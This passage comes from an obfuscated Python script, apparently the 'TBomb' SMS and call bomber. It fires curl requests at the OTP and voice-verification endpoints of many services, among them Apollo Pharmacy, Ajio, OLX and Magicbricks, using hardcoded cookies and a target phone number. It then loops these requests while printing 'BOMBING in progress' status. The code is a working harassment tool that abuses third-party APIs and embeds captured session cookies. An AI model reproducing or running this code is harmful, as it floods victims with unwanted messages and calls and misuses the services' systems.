"referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile='+O00OO00OO0OO0O0OO +'\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1')#line:344:'curl -s -X POST -H "Host:www.apollopharmacy.in" -H "content-length:17" -H "accept:*/*" -H "origin:https://www.apollopharmacy.in" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.apollopharmacy.in/sociallogin/mobile/login/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:__cfduid=d64c65a2edad54086382759cdf599de901558686615" -H "cookie:_ga=GA1.2.1278908803.1558686621" -H "cookie:__ta_device=fAz8eA9Rx40yyIiB5mzvHt4apFaSkMBA" -H "cookie:_fbp=fb.1.1558686627127.655454618" -H "cookie:__stat="BLOCK"" -H "cookie:jv_visits_count_EXRKNIzFkV=1" -H "cookie:__stp={"visit":"returning","uuid":"d9a1c39d-efbd-4911-ac0e-6333455f9fbb"}" -H "cookie:PHPSESSID=vnj2hvk8nga4v1m2hvlmvl88r4" -H "cookie:_gid=GA1.2.132668726.1560239715" -H "cookie:_gat=1" -H "cookie:__ta_visit=f5uvpYKu8EVmJAJmFGXMmXGSTiNQSWRS" -H "cookie:_gat_UA-31142855-1=1" -H "cookie:__ta_ping=1" -H "cookie:mage-cache-storage=%7B%7D" -H "cookie:mage-cache-storage-section-invalidation=%7B%7D" -H "cookie:mage-cache-sessid=true" -H "cookie:mage-messages=" -H "cookie:private_content_version=46e6c8611a9b0d06e662da50ca5cf311" -H "cookie:AWSALB=2177QHjXXrFgaem1w0FrBqZ2aoKrMhI+DibolJaee9cVOP4ZSV2LiLC3tks68ud4ERCydxa8kb4klbiI+VEnNQB0rsyins1USgvHcPOUoz2nySN3SC5G/wpAACIq" -H "cookie:section_data_ids=%7B%22cart%22%3A1560239751%7D" -d \'mobile=' + pn + '\' "https://www.apollopharmacy.in/sociallogin/mobile/sendotp/" --output temp.xxx1') while not os .path .exists ('temp.xxx1'):#line:345:while not os.path.exists('temp.xxx1'): time .sleep (0.1 )#line:346:time.sleep(0.1) OO00OO0O000O00OOO =str (open ('temp.xxx1','rb').read ())+" "#line:347:rd = str(open('temp.xxx1', 'rb').read()) + " " return OO00OO0O000O00OOO .find ("sent")!=-1 #line:348:return rd.find("sent") != -1 elif OOO0O0OOOOO0O00OO ==13 :#line:349:elif lim == 13: OO00OO0O000O00OOO =' '#line:350:rd = ' ' try :#line:351:try: OO00OO0O000O00OOO =os .popen (' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"'+O00OO00OO0OO0O0OO +'","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read ()#line:353:' curl -s -X POST -H "Host:www.ajio.com" -H "Connection:keep-alive" -H "Content-Length:144" -H "Accept:application/json" -H "Origin:https://www.ajio.com" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "Referer:https://www.ajio.com/signup" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "Cookie:_ga=GA1.2.979928319.1560364071; _gid=GA1.2.666270216.1560364071; V=201; _fbp=fb.1.1560364076913.1528349725; cto_lwid=d91bea3a-7610-45aa-8f78-65a0d740fb46; PushSubscriberStatus=DENIED; peclosed=true; G_ENABLED_IDPS=google; TS018cc593=01ef61aed0fca110f50d8e3be2c66eb83188f6df8495c0ed2cd772829370fc12690954aad0834f545b57764467dbb66efb05d481a8958aebb273751956ef9eb383a3ba22dd1c94d82021e9d4c40011d4ab9bd97c6f0a74628ac12e8f7bcb663c1608e7288ebd252051cb84def3b021d3bcf643d3f3728ca9c0d9c780d171578ba966774f11ac44864a7f3da59791cb55f2741f23d72f7843efe9306459c00ec2e5f00065729a8573baba42384bb7cf46eb55cf89f72f1dcd5619a26e4ff32c63d06cac8c4bb158da6640bc0b11193134cbf38050ae0db230aa258b1181749fb0373afe041ad1aeffd0c08be7a62010db02cc65edfb1341d2de54cdf475c5dcd84e16c64c50; _gac_UA-68002030-1=1.1560366197.Cj0KCQjwxYLoBRCxARIsAEf16-tx5UXrrP9SEhR8dPkTL4a9woEF7Ae-kvSlzKdgq35y31DeK3_uhg8aAkRBEALw_wcB; cdigiMrkt=utm_source%3A%7Cutm_medium%3A%7Cdevice%3Amobile%7Cexpires%3AFri%2C%2012%20Jul%202019%2019%3A03%3A17%20GMT%7C; ImpressionCookie=4; ip=10.1.10.1; sessionStatus=true|undefined; FirstPage=Thu Jun 13 2019 00:33:53 GMT+0530 (India Standard Time); _dc_gtm_UA-68002030-1=1; uI=johnyaho%40gmail.com; TS01fe4249=01ef61aed09c32c6a53ce9e431a6a719c416867f2f3ad713fde2e74175bc248acc7a523f41e9751d032859a159bfff87664b90c3d0a9dfb2392f75876ccbe273b8a8e81d7a8d25047453c17a2905eca7eff26b780c" -d \'{"firstName":"Rox","login":"johnyaho@gmail.com","password":"Rock@5star","genderType":"Male","mobileNumber":"' + pn + '","requestType":"SENDOTP"}\' "https://www.ajio.com/api/auth/signupSendOTP" ').read() except Exception :#line:354:except Exception: return True #line:355:return True if OO00OO0O000O00OOO .find ("\"statusCode\":\"1\"")!=-1 :#line:356:if rd.find("\"statusCode\":\"1\"") != -1: return True #line:357:return True else :#line:358:else: return False #line:359:return False elif OOO0O0OOOOO0O00OO ==14 :#line:360:elif lim == 14: OO0O0OO00000OO00O ='{"country_code":"'+OO0000O0O00O0OOO0 +'","phone_number":"'+O00OO00OO0OO0O0OO +'"}'#line:361:con = '{"country_code":"' + cc + '","phone_number":"' + pn + '"}' os .popen ('rm temp.xxx2 > /dev/null 2>&1')#line:362:os.popen('rm temp.xxx2 > /dev/null 2>&1') os .system ('curl -s -X POST -H "Host:api.cloud.altbalaji.com" -H "Connection:keep-alive" -H "Content-Length:'+str (len (OO0O0OO00000OO00O ))+'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \''+OO0O0OO00000OO00O +'\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2')#line:364:'" -H "Accept:application/json, text/plain, */*" -H "Origin:https://lite.altbalaji.com" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Mobile Safari/537.36" -H "Content-Type:application/json;charset=UTF-8" -H "Referer:https://lite.altbalaji.com/subscribe?progress=input" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -d \'' + con + '\' "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN" -o temp.xxx2') while not os .path .exists ('temp.xxx2'):#line:365:while not os.path.exists('temp.xxx2'): time .sleep (0.1 )#line:366:time.sleep(0.1) OO00OO0O000O00OOO =hashlib .md5 (open ('temp.xxx2','rb').read ()).hexdigest ()#line:367:rd = hashlib.md5(open('temp.xxx2', 'rb').read()).hexdigest() return OO00OO0O000O00OOO =='24f467b24087ff48c96321786d89c69f'#line:368:return rd == '24f467b24087ff48c96321786d89c69f' elif OOO0O0OOOOO0O00OO ==15 :#line:369:elif lim == 15: OO00OO0O000O00OOO =os .popen ('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email='+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read ().strip ()#line:370:rd = os.popen('curl -s -X POST -H "Host:www.aala.com" -H "Connection:keep-alive" -H "Accept:application/json, text/javascript, */*; q=0.01" -H "Origin:https://www.aala.com" -H "X-Requested-With:XMLHttpRequest" -H "Save-Data:on" -H "User-Agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36" -H "Content-Type:application/x-www-form-urlencoded; charset=UTF-8" -H "Referer:https://www.aala.com/" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6,ar;q=0.5" -H "Cookie:frontend=a27mn3h3irt1rlt6i55s93p9r5; frontend_cid=8zqBBzwQTMIt9UKg; _BEAMER_USER_ID_gADrycBn12870=c9fe4f7d-b421-4bad-9cf2-0a4db716dff4; G_ENABLED_IDPS=google" -d \'email=' + cc + pn + '&firstname=SpeedX&lastname=SpeedX\' "https://www.aala.com/accustomer/ajax/getOTP"').read().strip() return OO00OO0O000O00OOO .find ('code:')!=-1 #line:371:return rd.find('code:') != -1 elif OOO0O0OOOOO0O00OO ==16 :#line:372:elif lim == 16: os .popen ('curl -s -X POST -d \'method=SMS&countryCode=id&phoneNumber='+OO0000O0O00O0OOO0 +O00OO00OO0OO0O0OO +'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"')#line:374:'&templateID=pax_android_production\' "https://api.grab.com/grabid/v1/phone/otp"') return True #line:375:return True elif OOO0O0OOOOO0O00OO ==100 :#line:376:elif lim == 100: OO00OO0O000O00OOO =os .popen ('curl -s -X GET "https://www.makaan.com/apis/nc/sendOtpOnCall/16257065/'+O00OO00OO0OO0O0OO +'?callType=otpOnCall"').read ()#line:378:pn + '?callType=otpOnCall"').read() return OO00OO0O000O00OOO .lower ().find ("new otp has been")!=-1 #line:379:return rd.lower().find("new otp has been") != -1 elif OOO0O0OOOOO0O00OO ==101 :#line:380:elif lim == 101: OO00OO0O000O00OOO =os .popen ('curl -s -X POST -d mobile=%2B'+OO0000O0O00O0OOO0 +'-'+O00OO00OO0OO0O0OO +' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read ()#line:382:' https://marketing.tllms.com/elearn/api/v4/authentications/phone_call').read() return OO00OO0O000O00OOO .lower ().find ("otp requests exceeded")==-1 #line:383:return rd.lower().find("otp requests exceeded") == -1 elif OOO0O0OOOOO0O00OO ==102 :#line:384:elif lim == 102: OO00OO0O000O00OOO =os .popen ('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num='+O00OO00OO0OO0O0OO +'&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read ()#line:385:rd = os.popen('curl -s -X POST -H "Host:www.realestateindia.com" -H "content-length:58" -H "accept:text/html, */*; q=0.01" -H "origin:https://www.realestateindia.com" -H "x-requested-with:XMLHttpRequest" -H "save-data:on" -H "user-agent:Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/x-www-form-urlencoded; charset=UTF-8" -H "referer:https://www.realestateindia.com/thanks.php?newreg" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" -H "cookie:_gat=1" -H "cookie:rei_mem_mobile_verify_status=0" -H "cookie:rei_mem_email_verify_status=N" -H "cookie:rei_mem_block_status=0" -H "cookie:rei_member_country=IN" -H "cookie:rei_paid_status=0" -H "cookie:rei_member_type=1" -H "cookie:rei_member_email=Fakemam%40ril.com" -H "cookie:rei_member_name=Fakeman" -H "cookie:rei_member_id=1547045" -H "cookie:cooki_sess_id=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:name=9q8bsucj6mgvu2dc03bfsvlf07" -H "cookie:_gid=GA1.2.626525909.1560836369" -H "cookie:_ga=GA1.2.1033079331.1560836369" -H "cookie:visitedToken=176961560836367" -d \'action_id=call_to_otp&mob_num=' + pn + '&member_id=1547045\' "https://www.realestateindia.com/mobile-script/indian_mobile_verification_form.php?sid=0.5983221395805354"').read() return OO00OO0O000O00OOO .lower ().find ("y")!=-1 #line:386:return rd.lower().find("y") != -1 elif OOO0O0OOOOO0O00OO ==103 :#line:387:elif lim == 103: os .system ('curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91'+O00OO00OO0OO0O0OO +'"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1')#line:389:'curl -s -X POST -H "Host:www.olx.in" -H "content-length:44" -H "accept:*/*" -H "x-newrelic-id:VQMGU1ZVDxABU1lbBgMDUlI=" -H "origin:https://www.olx.in" -H "user-agent:Mozilla/5.0 (Linux; Android 5.0.2; SH-04G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36" -H "content-type:application/json" -H "referer:https://www.olx.in/" -H "accept-encoding:gzip, deflate, br" -H "accept-language:en-US,en;q=0.9" -H "cookie:onap=16b1b8f48d4x746d47ab-1-16b1b8f48d4x746d47ab-19-1559537345" -H "cookie:bm_sv=CDB97F50DA6615AC420F3E6E77B04E42~OoX2fAuP7ggcNa0VjzE95FzJNKRdJlW09Hja0/cysIGF1sJoBO7i0ndGXqnTWLaunlyxktHLbE8BSstPCRYn8VdP15lvUxK3ZY9ahXOSgwAidxwXd1jCe5wjIzYbiXp5eKNWfFpowhFbpxloe+SrbiE0YHJVPcCV5bmdsHgPfQc=" -H "cookie:AMP_TOKEN=%24NOT_FOUND" -H "cookie:hint=true" -H "cookie:_gid=GA1.2.369819276.1559535517" -H "cookie:_ga=GA1.2.665688753.1559535517" -H "cookie:ldTd=true" -H "cookie:G_ENABLED_IDPS=google" -H "cookie:HIDE_ONBOARDING_LOCATION=true" -H "cookie:testCookie=testCookie" -H "cookie:ak_bmsc=307C5311FB00A3F4E856AFFE1A9D000B0214BED9E0210000909FF45C1E802067~plFZfbMQGgEDr7OWVe9FvqfT24ZtOVMamtYcaip71IYOrv2+SQ6fokSvMk2Uesz5v1sFfaichbtDgeVSj3te3vXJKezSWgvoVWrK7gfzFrLz1ruBm0MQj01V5CmpaTr6tRgDRSN6bks3nqvOHzR0tA1IoqfDfq2MKtmDjbknCI5FlLYUTwqlnwHowYArfybn2n3yilE6VKHjW+tH8kqjAfH8BGuijpmO9pNkgmIyOeaZIVM3k6FGOL3Wj3jLI8uGaU" -H "cookie:_abck=153BD3D333948A58932748CAC3D4C3F40214BED9E0210000909FF45C18838E05~0~8O+udxdG38sBFTPZpaBL4IGj7eUcKJ1VwAtJ52GMO5E=~-1~-1" -H "cookie:bm_sz=BD665D919F7C6FA8374F196445596436~YAAQ2b4UArpOAwtrAQAAq0qPGwNksHBgphLwDzwfBlwIRQJAG7txmjBo/of7NiAJ93gy/7vBhQ9l5sIKdwtl2j+U4bys2Hhh5tZlZL/jqdnW/JrgmgawcxiunAJ32BbY9UtnFIrNxbbRvzQCYnSwf/cz9a7jURsui7leuLaVm7mQEcHPOtC6g5jrToAMTbdA" -H "cookie:97c09e2aabdfed89b87a3010d7f13c64=353b4f9fd82d26268ad11b2c1e9ae019" -H "cookie:lqstatus=1559536704" -H "cookie:laquesis=pan-26381@a#pan-27752@b#pan-30043@b#pana-26381@b" -d \'{"type":"call","descriptor":"+91' + pn + '"}\' "https://www.olx.in/api/challenges" >/dev/null 2>&1') return True #line:390:return True elif OOO0O0OOOOO0O00OO ==104 :#line:391:elif lim == 104: OO00OO0O000O00OOO =os .popen ('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile='+O00OO00OO0OO0O0OO +'"').read ().decode ('utf-8')#line:392:rd = os.popen('curl -s -X GET -H "Host:api.magicbricks.com" -H "Connection:keep-alive" -H "User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.89 Safari/537.36" -H "Save-Data:on" -H "Accept:image/webp,image/apng,image/*,*/*;q=0.8" -H "Accept-Encoding:gzip, deflate, br" -H "Accept-Language:en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6" "https://api.magicbricks.com/bricks/verifyOnCall.html?mobile=' + pn + '"').read().decode('utf-8') return OO00OO0O000O00OOO .lower ().strip ().find ('callmade')!=-1 #line:393:return rd.lower().strip().find('callmade') != -1 elif OOO0O0OOOOO0O00OO ==106 :#line:394:elif lim == 106: OO00OO0O000O00OOO =os .popen ('curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id='+O00OO00OO0OO0O0OO +'"').read ()#line:396:'curl -s "https://www.myupchar.com/user_profile/resend_otp_via_voice?id=' + pn + '"').read() return OO00OO0O000O00OOO .find ("1")!=-1 #line:397:return rd.find("1") != -1 return False #line:398:return False def remsp (O000O0OO0O00OO0OO ):#line:401:def remsp(num): O000O0OO0O00OO0OO =O000O0OO0O00OO0OO .replace (' ','')#line:402:num = num.replace(' ', '') O000O0OO0O00OO0OO =O000O0OO0O00OO0OO .replace ('-','')#line:403:num = num.replace('-', '') return O000O0OO0O00OO0OO #line:404:return num def start (OOO000OO00O000000 ,O0OOOOOOO000OOOO0 ,O0000000OOO00OOO0 ,O00OOO000OOO0O000 ,OO0O0000O0OO0O000 ):#line:407:def start(target, counter, delay, ch, cc): os .system ("clear")#line:408:os.system("clear") banner ()#line:409:banner() OOO0O000OOO00O00O =0 #line:410:failed = 0 OOOOO0O0O0O00OO0O =0 #line:411:requested = 0 O00O00000OO0O000O =int (OOOOO0O0O0O00OO0O )-int (OOO0O000OOO00O00O )#line:412:success = int(requested) - int(failed) O0000O0OO0O0OOO00 =int (O0OOOOOOO000OOOO0 )+1 #line:413:bombs = int(counter) + 1 while O00O00000OO0O000O <(int (O0000O0OO0O0OOO00 )):#line:414:while success < (int(bombs)): os .system ('clear')#line:415:os.system('clear') banner ()#line:416:banner() try :#line:417:try: OOO000OOO00OOO000 =random .choice (O00OOO000OOO0O000 )#line:418:api = random.choice(ch) except Exception :#line:419:except Exception: if OO0O0000O0OO0O000 =="91":#line:420:if cc == "91": print ('Sorry All APIs Have Expired Please Update TBomb')#line:421:print('Sorry All APIs Have Expired Please Update TBomb') input ('Press Enter To Exit...')#line:422:input('Press Enter To Exit...') exit ()#line:423:exit() else :#line:424:else: if O00O00000OO0O000O >0 :#line:425:if success > 0: print ('\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...')#line:427:'\n\n\tWe Are Sorry To Say That Bombing Limit For Your Country Has Been Reached...') print ('\nWe Are Working Too Hard To Increase The International Limit...')#line:429:'\nWe Are Working Too Hard To Increase The International Limit...') input ('\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...')#line:431:'\nThis will help us to give support to your country fast...\n\nPress Enter To Exit...') os .system ('rm *.xxx* > /dev/null 2>&1')#line:432:os.system('rm *.xxx* > /dev/null 2>&1') print ('\n\n')#line:433:print('\n\n') banner ()#line:434:banner() exit ()#line:435:exit() else :#line:436:else: print ('\n\n\tSorry Your Country is Not Supported...')#line:437:print('\n\n\tSorry Your Country is Not Supported...') print ('\t\tPlease Send A Mail To techpsycho5.0@gmail.com To Let Us Know...')#line:439:'\t\tPlease Send A Mail To techpsycho4.0@gmail.com To Let Us Know...') input ('Press Enter To Exit...')#line:440:input('Press Enter To Exit...') exit ()#line:441:exit() print ("==================================================================")#line:442:print("==================================================================") print (" BOMBING in progress, please wait !! ")#line:443:print(" BOMBING in progress, please wait !! ") print (" Please keep your data connection active during bombing !! ")#line:444:print(" Please keep your data connection active during bombing !! ") print ("==================================================================")#line:445:print("==================================================================") print (" Target Number : +"+str (OO0O0000O0OO0O000 )+" ",OOO000OO00O000000 )#line:446:print(" Target Number : +" + str(cc) + " ", target) print (" Number of Requests Sent : ",OOOOO0O0O0O00OO0O )#line:447:print(" Number of Requests Sent : ", requested) print (" Successful Requests : ",O00O00000OO0O000O 